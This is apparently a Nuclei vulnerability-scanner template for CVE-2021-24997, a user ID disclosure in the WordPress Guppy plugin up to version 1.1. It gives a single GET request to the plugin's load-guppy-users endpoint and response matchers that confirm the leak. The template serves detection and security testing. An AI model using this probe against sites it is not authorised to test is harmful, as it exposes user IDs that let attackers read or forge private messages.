id: CVE-2021-24997 info: name: Wordpress Guppy <=1.1 - User ID Disclosure author: Evan Rubinstein severity: medium description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another. reference: - https://www.exploit-db.com/exploits/50540 - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2021-24997 - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2021-24997 cwe-id: CWE-862 tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan requests: - method: GET path: - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - '"guppyUsers":' - '"userId":' - '"type":' condition: and